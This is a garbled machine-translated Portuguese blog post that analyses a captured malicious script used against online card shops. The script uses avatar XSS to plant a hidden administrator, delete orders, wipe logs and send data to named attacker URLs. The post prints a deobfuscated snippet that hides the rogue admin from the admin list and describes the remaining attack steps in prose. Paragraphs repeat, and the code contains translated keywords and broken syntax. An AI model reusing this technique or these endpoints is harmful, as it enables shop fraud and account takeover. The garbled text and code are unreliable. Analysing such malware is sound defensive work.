Análise de Script para a Exploração da Vulnerabilidade de Compra de $0 Bizarre Hairpin-1
prefácio
A razão para o recente aumento da intensidade das compras a zero dólares visando o heteródino é o facto de os autores não terem protegido devidamente os seus sítios Web. De acordo com os internautas entusiastas, bem como com o seu próprio script de exploração de vulnerabilidades capturado, escrevemos aqui uma série de artigos de análise. O autor do script de vulnerabilidade deste artigo, o uso de código xss de injeção de avatar e, em seguida, usar o medo do administrador de ser hackeado para ver os registos de fundo do psicológico, projetar código malicioso neste momento, de modo a alcançar o uso de privilégios de administrador para atingir o objetivo da compra de zero yuan.
A razão para o recente aumento da intensidade das compras a zero dólares visando o heteródino é o facto de os autores não terem protegido devidamente os seus sítios Web. Com base em internautas entusiastas, bem como nos seus próprios scripts de exploração de vulnerabilidades capturados, estamos a escrever esta série de artigos de análise.
Há uma coisa a dizer sobre não ter medo de ser pirateado, desde que não tenha qualquer rendimento diário e não tenha cartões.
declara
Para evitar mais exploração maliciosa, todo o código e descrições nesta publicação foram ocultados.
delineado
O autor do script de vulnerabilidade deste artigo, a utilização de código xss de injeção de avatar e, em seguida, utilizar o medo do administrador de ser pirateado para ver os registos de fundo da psicologia, a conceção de código malicioso neste momento para executar, de modo a conseguir a utilização da autoridade do administrador para atingir o objetivo de compra zero.
dissecação de código
Endereço do script de código malicioso
https://jiaoben.keeta1.top/
Descarreguei-o e descobri que estava ofuscado, uma simples desofuscação.
O processo não é mostrado, o código seguinte só é desencriptado para um nível legível para evitar a exploração.
A estrutura geral é a seguinte
Comece por adicionar um administrador com @admina.com!
$("td")["each"](function (_0x36ba71, _0x348775) {
console.log(_0x36ba71, _0x348775,_0x348775["innerHTML"]["indexOf"])
se (_0x348775["innerHTML"]["indexOf"]("@admina.com") ! = -1) {
var _0x53991d = $(this)["parent"]();
_0x53991d["remove"]().
}
})
A ideia é iterar através de todas as tabelas e, se uma tabela tiver um valor que contenha @admina.com, remover o seu elemento principal.
Acontece que a lista de administradores é uma tabela, pelo que o administrador que contém @admina.com pode ser ocultado. Isto significa que o administrador não é visível no backend, mas apenas na base de dados.
Depois de executar os resultados como indicado acima, a gestão desapareceu.
O único inconveniente é que a linha inferior, "Mostrar registos 1 a 1, total de 1 registos", deve ser reduzida em um. Caso contrário, não está a funcionar.
E depois há a função de hacker de chaves.
Em primeiro lugar, de acordo com o título para determinar se a interface de registo de operações em segundo plano
Um temporizador será então ativado para executar o código malicioso.
O código malicioso no temporizador não será executado se não estiver na interface do operador de registo em segundo plano.
Primeiro, solicite o cartão para encontrar o ID do utilizador com o nome de utilizador toptoones
Em seguida, com base no id devolvido, faça o seguinte
Eliminar este utilizador primeiro
Em seguida, chamar o plugin de destruição de encomendas para destruir a encomenda deste utilizador
Se não tiver este plugin instalado, este antigo 6 também será útil para chamar a API para o ajudar a descarregar da loja de plugins, ativar o plugin, destruir a encomenda, fechar o plugin, desinstalar o plugin e, já agora, para o ajudar a limpar os registos de fundo.
Em seguida, injecta o código do avatar do administrador onde diz no início que esconde o administrador malicioso, de modo a que, assim que entrar no backend, o código malicioso seja ativado.
Em seguida, carregará as suas informações para o seu backend.
https://keeta1.top/hook/log
https://keeta1.top/bdstatic.com/?callback=jsonp
Depois, verifica se existe um plugin de pagamento fácil no backend e injecta código se existir. Acho que devia ter tentado alterar a configuração de pagamento, mas não o fiz por algum motivo, e provavelmente vou fazer uma atualização.
Também trata da proteção de fundo com cuidado
Por fim, há todo o tipo de limpeza de registos e transferência de dados.
resumos
renúnciafantasiar(Interdimensional)
ver a realidade
Arranja outra escova de cabelo, o autor nem sequer apareceu.
转载请注明:Cartão de cabelo bizarro 0 yuan purchase vulnerability exploit script analysis-1 | MJJ hair card navigation